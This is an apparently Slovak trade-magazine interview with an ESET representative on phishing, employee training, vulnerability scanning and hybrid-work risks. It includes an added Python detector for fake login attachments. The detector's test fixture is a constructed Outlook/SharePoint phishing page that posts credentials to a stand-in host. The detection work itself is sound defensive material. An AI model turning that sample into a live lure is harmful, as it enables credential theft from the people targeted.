
Antivirus is not enough today! What are the biggest pitfalls of corporate cybersecurity

Did you know that the vast majority of cyber attacks are caused by human error and lack of employee knowledge? And the incidents are steadily increasing. In the first half of 2023 alone, the number of fraudulent phishing emails in the country tripled.

While until recently fraudulent messages were relatively easy to recognise by their poor grammar or incoherent context, the advent of artificial intelligence has brought a rise in higher-quality fraudulent messages that even experienced IT professionals increasingly struggle to spot.

ESET products have detected and blocked three frequently occurring threats in just 6 months:

  • A fake HTML/Phishing.Agent login window, distributed as an HTML attachment via e-mail, which, when opened in a browser, mimicked Microsoft Office services such as Outlook or SharePoint.
  • A DOC/Fraud sextortion e-mail in which the attacker claimed to possess a sensitive sexual video of the victim and demanded €1,500 in bitcoin not to release it; according to ESET, this attack saw a 277% increase.
  • Phishing abusing the Slovenská pošta brand, in which an e-mail message announced the delivery of a fictitious package after payment of a fictitious customs fee. The scam appeared 275% more frequently this year, moving up seven places in the phishing threat rankings.
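As an added example that is not from the article or from ESET, the following Python heuristic flags HTML e-mail attachments of the kind described in the first item: a page that prompts for a password, mentions Microsoft brands such as Outlook or SharePoint, and submits its form to an outside host. The two sample attachments are constructed, and the brand list and host names are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed brand words that a fake Office login page typically displays.
BRAND_TERMS = ("microsoft", "office 365", "outlook", "sharepoint", "onedrive")


class _LoginFormScanner(HTMLParser):
    """Collects password inputs, form targets and visible text from an HTML file."""

    def __init__(self):
        super().__init__()
        self.password_fields = 0
        self.form_actions = []
        self.text_chunks = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        if tag == "form":
            self.form_actions.append(a.get("action") or "")

    def handle_data(self, data):
        self.text_chunks.append(data)


def scan_html_attachment(html: str) -> dict:
    """Return a verdict for an HTML attachment: a legitimate attachment has no
    reason to ask for a password, so any password prompt is treated as suspicious;
    brand words and external form targets are recorded as supporting evidence."""
    p = _LoginFormScanner()
    p.feed(html)
    visible = " ".join(p.text_chunks).lower()
    brands = [t for t in BRAND_TERMS if t in visible]
    # Absolute form actions reveal where harvested credentials would be sent.
    external_hosts = [h for h in (urlparse(x).hostname for x in p.form_actions) if h]
    return {
        "suspicious": p.password_fields > 0,
        "password_fields": p.password_fields,
        "brands": brands,
        "external_hosts": external_hosts,
    }


# Constructed samples: a credential-harvesting page and a harmless newsletter.
PHISH_SAMPLE = """<html><head><title>Sign in to your account</title></head><body>
<h1>Outlook</h1><p>Your session expired. Sign in again to open the SharePoint file.</p>
<form action="https://collector.example/submit" method="post">
<input type="email" name="u"><input type="password" name="p">
<input type="submit" value="Sign in"></form></body></html>"""
BENIGN_SAMPLE = "<html><body><h1>Quarterly newsletter</h1><p>See the attached report.</p></body></html>"

if __name__ == "__main__":
    for name, sample in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_html_attachment(sample))
```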

We spoke to Július Selecký, Senior Technical Pre-Sales Representative at ESET, about these cyber pitfalls and the resulting importance of education and awareness in corporate cybersecurity.

Július Selecký, Senior Technical Pre-Sales Representative, ESET

Cybersecurity in companies today is in the hands of not only IT administrators, but also employees and company management. Why are education and awareness in this area so important?

Corporate security rests on three main pillars: people, technology and processes. Everyone from support staff to senior management should be informed about important security issues in the company, and the resilience of the entire company will be greatly enhanced. People in the company need to be given the same attention as security software or hardware and policies. Their training is often neglected, yet it is people who are the most frequent attack vectors.
ESET regularly trains its employees internally, for example in detecting phishing emails. If we look at the statistics, phishing, an email that tries to extort access data or bank details, is at the top of the list of cyber threats. Employees are therefore regularly tested by sending messages that look legitimate but are not, and it is the employee’s job to detect such fake messages. In turn, we offer clients ESET cyber security training, e-learning courses that serve to raise general awareness.

Do Slovak companies place enough emphasis on cyber security? How often do they need to be retrained?

Life around us is closely tied to information and communication technologies, and cyber incidents weaken companies, the state, or the entire economy, and people’s trust in these institutions. It is impossible to move forward without strengthening cybersecurity, which is why more and more emphasis is being placed on it. However, one-off training is of little use; education needs to be regular, because people need to keep security in sight so that they can automate it.

A suitable training format is once a year basic, general training for everyone who uses a PC in the company. Plus additional training throughout the year, e.g. on specific IT security topics or focused on employee roles (IT administrators, developers, accounting departments, management, etc.).

And in particular, what should companies focus on when educating employees about IT security?

The software development company will focus on secure development, the hotel chain on billing fraud prevention, the industrial facility on secure OT operation, etc. A company’s human risk management should consist of a collection of activities based on the individual organization’s data and expert risk analysis, not out-of-context and chaotic reactions to current buzzwords.
However, training is only one part of education! The other, even more important, is practical experience. It is a proven fact that theory without practice is useless. For example, even employees who have heard about fraudulent emails and know that they contain a suspicious link will write their details in it the first time they are tested. Or employees who have heard of a password manager and know it’s a good idea to use it, but only a third of them actually do.

So how do you explain the necessity of enterprise IT security to company executives?

In the same way that locking doors, setting alarms and cameras are used to protect a physical space, cybersecurity is the same thing, only in the digital world. If I haven’t invested in these virtual locks yet, I’m going to look like I’m stuck somewhere in the last century. But in many cases, it takes an unpleasant personal experience, with not only ordinary employees but also senior management falling victim to attacks.

Recently, attackers selected a specific company via LinkedIn and offered an employee an attractive job position, and if he wanted to apply for it, he had to fill in a test that was sent to him in a certain file. But when he opened the file at work, it contained dangerous malware, and as soon as it was launched, it got into the company network, scanned it, found out how many vulnerable computers there were, and spread further. In this way, the attackers gained access to company data. If the employee in question had been trained, he would have known not to run this type of file on a work computer, but in an isolated area, and a similar incident would not have occurred.

So, can we name the biggest current cyber threats that companies should definitely watch out for?

Experience shows that the most common risks, which should also be taken into account by education, are social engineering and phishing, unintentional data leaks or weak authentication mechanisms. Each type of organisation has different risks arising from human behaviour.

ESET has published the top 10 cyber threats on its information and education portal Bezpecnevofirme.eset.com, with top rankings for pitfalls such as inconsistent management of corporate systems, phishing and other fraudulent messages, ransomware attacks and risks caused by the rise of hybrid working. For ordinary people and households, ESET has set up the Bezpecnenanete.eset.com portal.

Companies often use several different servers, such as a mail server, web server, DNS, VPN, etc. How to protect such devices or detect their weaknesses in time?

Here it is important to implement a system for automated vulnerability scanning, called Vulnerability Assessment, which ESET also offers as a service for finding and managing vulnerabilities. In this way, weaknesses in systems (servers) that attackers exploit in an attempt to harm the company can be detected early. The customer receives a report with a description of the identified weaknesses with an assessment of their severity. Subsequently, after consultation with ESET experts, we will recommend steps to eliminate the identified weaknesses. In this regard, companies can also turn to a dedicated ESET partner such as GAMO.

In order to bring this additional layer of protection to as many customers as possible, we at ESET have decided to implement Vulnerability and Patch Management into our protection solutions as well. It can proactively monitor vulnerabilities in operating systems and common applications, and also enables automated deployment of patches on endpoint devices that are managed through our unified PROTECT platform.

Hybrid work is a new phenomenon after the pandemic. Let us conclude by saying a little more about the main risks it poses.

This is a real challenge for IT security specialists. Hybrid work, i.e. working in the office one day and at home the next, brings with it a number of risks such as problematic protection of the corporate network, poorly secured network at home, or poor security of access to corporate systems from the home-office. There is also a higher risk of lost or stolen devices, using private devices for work, or a higher likelihood of an employee falling for phishing. For example, full-disk encryption on corporate devices, reliable security software on endpoint devices with anti-theft capabilities, and again, employee education could help.

Of course, there is no 100% solution that, once implemented, lets you say you are protected. Most of the time, it is a set of comprehensive measures that can significantly reduce cyber risks.

Published: 18. December 2023

Gabriela Repatá

GAMO a.s.

This article is part of magazine no.
